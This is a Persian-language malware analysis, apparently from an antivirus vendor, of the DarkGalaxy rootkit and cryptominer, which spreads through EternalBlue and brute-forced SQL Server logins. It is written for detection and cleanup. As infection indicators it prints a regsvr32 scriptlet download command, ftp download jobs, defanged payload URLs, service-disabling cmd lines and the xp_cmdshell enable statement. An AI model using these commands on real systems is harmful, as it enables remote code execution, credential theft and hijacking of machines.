Rootkit.Win32.DarkGalaxy.a

شرح کلی

نوع: روت کیت (RootKit)
درجه تخریب: بالا
میزان شیوع: متوسط
آسیب‌پذیری مورد استفاده: EternalBlue) CVE-2017-0146 / MS17-010)

روت کیت (Rootkit) چیست؟

روت کیت‌ها بر عملکرد هسته سیستم عامل تاثیر مخرب می‌گذارند. این تغییرات می‌تواند باعث مخفی شدن عملکرد اصلی فایل‌ها، پردازه‌ها، سرویس‌های داخلی ویندوز و … شود. همچنین، بدافزار ممکن است بدون اطلاع کاربر با اتصال به سرور راه‌دور خود، اقدام به به‌روزرسانی فایل‌های خود نماید. از فعالیت‌های اصلی روت کیت‌ها می‌توان به تغییر MBR سیستم و ساخت درایورهای مخرب یا تغییر در نحوه عملکرد درایورهای سالم اشاره نمود.

بدافزار Darkgalaxy چیست؟

این بدافزار که با هدف استخراج ارز دیجیتال وارد سیستم قربانی می‌شود، با دانلود و بهره‌گیری از ابزارهای مختلف، اقدام به فعالیت‌های مخرب بر روی سیستم و شبکه قربانی می‌کند. از جمله مهم‌ترین فعالیت‌های این بدافزار می‌توان به دانلود نسخه‌های جدید و به‌روزرسانی فایل اصلی بدافزار، سرقت اطلاعات، استخراج ارز دیجیتال، تغییر DNS و اجرای بات نت Mirai بر روی شبکه قربانی اشاره نمود. این بدافزار علاوه بر کلاینت‌ها بر روی ابزارهای IoT نیز تاثیر می‌گذارد.

توضیحات فنی

بدافزار Darkgalaxy از جمله بدافزارهای Miner و از دسته RootKitها می‌باشد و کدهای مخرب خود را در بخش MBR قرار داده که در نتیجه قبل از بوت شدن و بالا آمدن سیستم عامل، کدهای بدافزار اجرا می‌شود. همچنین، با ایجاد دو WMIObject سبب دانلود و اجرای یک سری از فایل‌های مخرب می‌شود.

علائم آلودگی

• بالا بودن پردازه‌ی lsmm.exe که جهت انجام عملیات Mining استفاده می‌شود
• وجود فایل‌های job با نام‌های Mysa1 ،Mysa2 و … در مسیر %Windir%\System32\Tasks
• وجود دو WMIObject به نام‌های ****youmm4 و****youmm3 در مسیر‌های root\cimv2 و root\subscription
• وجود مقدار زیر در مسیرهای run رجیستری:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\start
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\start
Data: regsvr32 /u /s /i:hxxp://js[.]0603bye[.]info:280/v.sct scrobj.dll

علائم آلودگی در روش حمله به سرورهای sql

1. کند شدن سیستم
2. وجود چندین گزارش شناسایی بدافزار با اسامی Trojan.Win32.Agent.sqlca و Miner.Win32.CoinMiner.c در لاگ IPS آنتی ویروس پادویش
3. وجود jobهایی با اسامی و دستورات اجرایی زیر:

ftp –s:c:\windows\wywtem\myusa.dvr ftpbacks.exe
ftp –s c:\windows\system\myusago.dvr pdoors.exe
حاوی کد هگز اسکریپت بدافزار dbdotas
حاوی کد هگز اسکریپت بدافزار dbdotas2
حاوی کد هگز اسکریپت بدافزار dbdotas3
EXEC [dbo].[SqlStoredProcedure] Sqlrca

4. وجود فایلی با نام جعلی Winlogon.exe در مسیر C:\360safe\

شرح عملکرد فایل اصلی بدافزار

با بررسی محتوای WMIObject ایجاد شده توسط بدافزار، روال اجرا و انتشار آن مشخص شد. بدافزار ابتدا با اتصال به دامین‌های مشخص، اقدام به دانلود فایل‌های اصلی خود می‌کند.

hxxp[:]//173[.]247[.]239[.]186/ok.exe
hxxp[:]//173[.]247[.]239[.]186/upsupx.exe
hxxp[:]//173[.]247[.]239[.]186/u.exe

این دامین‌ها هر چند وقت یک بار تغییر می‌کنند.

فایل ok.exe یا Max.exe:

مسئول تغییر MBR دیسک سیستم قربانی می‌باشد.

فایل upsupx.exe:

فایلی با نام xpdown.dat را دانلود می‌کند. محتوای این فایل درواقع آدرس دانلود فایل bitcoin بدافزار می‌باشد.

فایل U.exe:

سبب تغییر DNS سیستم به دو مقدار 233.5.5.5 برای preferred DNS server و 8.8.8.8 برای alternate DNS server می‌شود.

در ادامه، بدافزار اقدام به دانلود لیست زیر می‌کند که هر کدام مسئول اجرای یکی از اهداف بدافزار هستند.

نام و مسیر ایجاد فایل مخرب عملکرد

%Windir%\system\downs.exe تغییر مجوزهای دسترسی فایل‌های مورد ‌نظر بدافزار در سیستم
%Windir%\system\cab.exe فایل به‌روزرسان بدافزار
%Windir%\inf\msief.exe اجرا کننده بات‌نت mirai
%Windir%\debug\item.dat سرویس بدافزار
%Windir%\system\my1.bat دانلودر فایل up.txt

پس از دانلود فایل‌های بالا، بدافزار طبق کد wmi خود اقدام به متوقف کردن پردازه‌های دیگر بدافزارهای Miner موجود در سیستم مثل bitminer ،noutrino و … می‌کند تا به راحتی بتواند اعمال مخرب خود را در سیستم اجرا کند. به این طریق که پردازه‌ی فایل‌های svchost.exe ،wininit.exe ،csrss.exe ،WUDFHosts.exe ،services.exe و taskhost.exe که در مسیری غیر از مسیر اصلی خود باشد را از طریق wmi حذف می‌کند.

همچنین، علائم آلودگی که توسط نسخه‌های قبلی ایجاد شده را جهت به‌روزرسانی خود حذف می‌کند. این بدافزار سرویس AnyDesk (سرویس نرم‌افزار ریموت دسکتاپ AnyDesk) را نیز متوقف می‌کند. با توجه به اینکه فایل ماینر بدافزار با نام lsmosee.exe در سیستم قربانی باید ایجاد شود، تمام مسیرها و فایل‌های موجود در مسیر %Windir%\debug\lsmosee.exe و  %Windir%\help\lsmosee.exe را حذف می‌کند تا نسخه جدید آنها را جایگزین نسخه‌های قبلی کند. همچنین Jobهایی با نام‌های WindowsUpdate1 ،WindowsUpdate3 ،Windows_Update ،Update ،Update2 ،Update3 ،Windowsinit ،System Security Check AdobeFlashPlayer و … را نیز حذف می‌کند.

جهت جلوگیری از آلوده‌سازی سیستم قربانی به دیگر بدافزارها و مختل کردن عمل Mining، دسترسی‌های پورت‌هایی که برای انتقال فایل مورد استفاده قرار می‌گیرند از جمله پورت 445 و 139 را می‌بندد و سپس اقدام به تعریف policy جدید با نام win برای ipsec می‌نماید. به این ترتیب، تنها کسانی که بدافزار بخواهد توانایی برقراری ارتباط با این سیستم را دارند.

با بررسی‌های صورت گرفته بر روی فایل، این فیلتر‌ها در سیستم عامل XP اعمال نمی‌شوند. در ادامه SMBDeviceEnabled را از طریق رجیستری Disable می‌کند.

فایل up.txt:

این فایل از طریق کدهای powershell اطلاعات سیستم را که شامل local ip ،public ip، میزان استفاده از پردازنده‌ها، مسیرفایل و commandline پردازه‌های در حال اجرا، نوع سیستم عامل و نسخه آن، ظرفیت HardDisk و username ،domain و password سیستم که از طریق اجرای ابزار mimikatz به دست آمده را در فایلی ذخیره کرده و آن را برای سرورهای بدافزار ارسال می‌کند.

فایل msief.exe:

• اجرا کننده بات نت mirai
• غیرفعال کردن سرویس‌های خاص از جمله NlaSvc:

%Windir%\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm
start= disabled&sc stop NlaSvc&sc config NlaSvc start=disabled

• ساخت سرویسی با نام xWinWpdSrv
• استفاده از ابزار masscan برای بررسی پورت‌های 445، 80، 8000
• انتشار بدافزار از طریق تکنیک brute force

همچنین، بدافزار برای انتشار خود با استفاده از فایل csrss.exe اقدام به اجرای آسیب‌پذیری EternalBlue بر روی سایر کلاینت‌ها و ساخت Backdoor بر روی آنها می‌کند.

روش انتشار بدافزار از طریق حمله به سرورهای SQL

این بدافزار پس از حمله به سیستم قربانی، اقدام به بدست آوردن پسورد نام کاربری “Sa” با استفاده از روش سعی و خطا (brute force) می‌نماید. در ادامه پس از یافتن پسورد درست و اتصال به sqlserver، اقدام به ایجاد Jobها و Procedureهای خود می‌کند.

در تصویر زیر محتوای یک نمونه از این jobها را مشاهده می‌کنید:

Dbdotas:

در ادامه قسمتی از محتوای دیکد شده job بالا را مشاهده می‌کنید:

 

در نمونه‌های دیگری از بدافزار، jobهایی با اسامی مشابه ممکن است وجود داشته باشد. این Jobها شروع به دانلود و ذخیره سازی فایل‌های دیگر بدافزار کرده و آنها را بلافاصله اجرا می‌کنند. این بدافزار فایل‌های دانلود شده مخرب را در مسیرهای زیر ذخیره می‌کند:

C:\windows\system\myusago.dvr
C:\windows\system\myusa.dvr
C:\360safe\winlogon.exe
C:\windows\system\backs.bat
C:\Program Files\kugou2010
C:\Program Files\shengda
C:\ WINDOWS\ps.exe
C:\windows\debug\items.dat
C:\windows\system32\wbem\123.bat
C:\Program Files\mainsoft\install.exe
C:\Program Files\shengda
C:\windows\system\mainfos.exe
C:\windows\system\upslist.txt

سپس، بدافزار فایلی جعلی با نام Winlogon.exe را در مسیر C:\360safe\ ایجاد کرده و با اجرای آن شروع به حمله به سرورهای sql آسیب‌پذیر می‌کند. بدافزار مورد نظر در ابتدای حمله پس از پیدا کردن رمز عبور حساب Sql server با استفاده از دستور EXEC sp_configure 'xp_cmdshell' ,1 اقدام به فعال کردن CmdShell کرده تا قابلیت اجرای کدهای مورد نظر و ایجاد Jobها از راه دور را داشته باشد. بدافزار با وصل شدن به سرور FTP خود با دامنه‌های مختلف، اقدام به دانلود فایل‌های مخرب خود می‌کند. نمونه‌ای از دامنه‌ی FTP Server که بدافزار به آن وصل می‌شود:

Down[.]1226bye[.]pw

روش مقابله و پاک‌سازی سیستم

آنتی ویروس پادویش این بدافزار را شناسایی کرده و از سیستم حذف می‌کند. همچنین اعمال برخی سیاست‎‌ها می‌تواند از بروز چنین حملاتی به طور حداکثری جلوگیری کند. مهمترین اقدامات عملی امنیتی که باید در هر شبکه‌ای انجام شود، به شرح زیر هستند:

۱. جهت پیشگیری از آلودگی‌های احتمالی توسط بدافزارهایی که از آسیب‌پذیری EternalBlue استفاده می‌کنند، پیشنهاد می‌شود از وصله امنیتی ارائه شده توسط مایکروسافت ms17-010 استفاده کنید. همچنین، جهت دریافت اطلاعات بیشتر در مورد این آسیب‌پذیری، به مقاله روش مقابله با اکسپلویت EternalBlue با شناسه CVE-2017-0146 / MS17-010 در پایگاه دانش پشتیبانی امن‌پرداز مراجعه نمایید. بخش جلوگیری از نفوذ (IPS) آنتی ویروس پادویش این گونه آسیب‌پذیری‌ها را شناسایی کرده و از ورود آنها به سیستم قربانی جلوگیری می‌کند.

۲. به‌روز بودن آنتی‌ویروس و بررسی گزارش‌های بخش جلوگیری از نفوذ به طور مرتب.

۳. از دیگر راه‌های نفوذ این بدافزار به شبکه سازمان‌ها می‌توان به سوء استفاده از رعایت نشدن سیاست‌های امنیتی لازم در مورد سرورهای SQL Server اشاره کرد. بنابراین، جهت پیشگیری از اجرای هر گونه دستور مخرب از راه دور توصیه می‌شود اقدامات زیر را جدی بگیرید:

  • بررسی نام‌های کاربری پایگاه داده و سطح دسترسی‌ها
  • غیرفعالسازی حساب‌های پیش فرض و بدون استفاده
  • تغییر پسوردها به صورت دوره‌ای
  • بازبینی دوره‌ای jobهای SQL Server
  • محدود نمودن دسترسی سیستم‌ها به سرور پایگاه‌داده SQL Server